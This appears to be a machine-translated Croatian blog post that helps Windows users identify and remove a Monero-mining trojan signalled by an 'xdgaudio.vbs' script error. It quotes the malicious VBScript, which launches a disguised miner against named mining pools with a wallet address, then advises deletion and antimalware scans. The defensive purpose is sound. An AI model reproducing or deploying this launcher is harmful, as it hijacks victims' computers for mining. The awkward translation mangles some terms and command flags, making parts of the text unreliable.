Ako u sustav primite sljedeću poruku o pogrešci koja se odnosi na 'xdgaudio.vbs', vaše je računalo najvjerojatnije zaraženo.
Skripta: C: windows xdgaudio.vbs
Redak: 3
Char: 1
Pogreška: Sustav ne može pronaći navedenu datoteku.
Šifra: 80070002
Izvor: (null)
Kada se uređuje s Notepadom, skripta može sadržavati retke kao što su dolje:
Dim WShell Set WShell = CreateObject ('WScript.Shell') WShell.Run 'wmipvrse.exe -B --donate level 1 -r 100 - niti 16 - cpu-prioritet 2 - cpu-affinity 2 -a cryptonight -O sloj + TCP: //xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -px -k -O sloj + TCP: //mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -P x”, 0 Postavi WShell = Ništa
Ovo sigurno izgleda kao trojanski trojac CPU / cryptocurrency Miner koji ne samo da usporava vaše računalo, već može predstavljati i sigurnosnu prijetnju. Datoteke skripti c: windows xdgaudio.vbs i c: windows servicecrsssr.vbs treba izbrisati. To nije dovoljno. Izvršite temeljito skeniranje koristeći malwarebytes antimalware, a također skenirajte s antivirusnim softverom koji koristite.
Za detaljne upute o uklanjanju takvog trojnika Miner, pogledajte vodič za malwaretips.com Kako ukloniti trojanski trojac CPU Miner iz sustava Windows (Vodič za pomoć virusima) .
Jedan mali zahtjev: Ako vam se svidio ovaj post, molim vas podijelite ga?
Jedna vaša 'majušna' dionica ozbiljno bi pomogla rastu ovog bloga. Nekoliko sjajnih prijedloga:- Prikvačiti!
- Podijelite ga sa svojim omiljenim blogom + Facebook, Reddit
- Tweet ga!